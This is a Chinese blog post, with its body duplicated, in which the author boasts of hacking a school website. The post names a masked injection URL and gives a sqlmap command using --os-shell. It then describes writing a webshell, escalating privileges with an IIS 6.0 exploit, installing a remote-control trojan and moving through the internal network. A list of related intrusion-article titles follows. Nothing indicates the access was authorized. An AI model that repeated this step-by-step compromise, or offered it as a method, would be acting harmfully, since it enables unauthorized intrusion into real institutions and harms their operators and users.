轻松入侵我学校网站
2016-11-24 23:13
197 查看
先上图:
START
注入点:http://www.xxxxx.com//manager/hello.aspx?id=261
看看数据库权限:
current-user
对于一个神级别一样的垃圾学校,想怎么日怎么日。sa
sa权限可以直接读取文件,再次过程中使用很多工具,读取目录。速度不堪入目。后来一个朋友说sqlmap的线程。果断给把线程弄到10了。
http://www.xxxxx.com//manager/hello.aspx?id=261 --os-shell --threads 10
很快便得到了网站的路径
e:\YBWebSite
直接sqlmap写shell
然后ii6.0exp秒提。内网又没外网服务器映射?直接远控挂起!
其实内网漫游了,有时间写文,
THE END
START
注入点:http://www.xxxxx.com//manager/hello.aspx?id=261
看看数据库权限:
current-user
对于一个神级别一样的垃圾学校,想怎么日怎么日。sa
sa权限可以直接读取文件,再次过程中使用很多工具,读取目录。速度不堪入目。后来一个朋友说sqlmap的线程。果断给把线程弄到10了。
http://www.xxxxx.com//manager/hello.aspx?id=261 --os-shell --threads 10
很快便得到了网站的路径
e:\YBWebSite
直接sqlmap写shell
然后ii6.0exp秒提。内网又没外网服务器映射?直接远控挂起!
其实内网漫游了,有时间写文,
THE END
相关文章推荐
- 记我一次成功的入侵学校网站服务器的黑客行动
- 企业网站不设防轻松入侵传木马
- 轻松入侵个人主页空间
- 网站漏洞解析及黑客入侵防范方法
- 入侵基于JSP+Tomcat的Web网站实录
- 手工入侵网站SQL语句
- ASP.NET 2.0中轻松实现网站换肤
- ASP.NET 2.0中轻松实现网站换肤
- 教育部网站被入侵事件的一点小说明
- <<< 入侵网站类提权注入教程
- jsp网站轻松发布发布只需修改tomcat配置
- 网站入侵a
- 免费MD5解密网站,轻松破解md5密码,mysql5/mysql323,ntlm,salt密码
- 我的学校网站
- 网站入侵总结
- 自己写的网站被入侵了
- 想要网站轻松上首页这样做才是关键
- 从域名到网站,只需四步,轻松访问
- 总结入侵网站的手法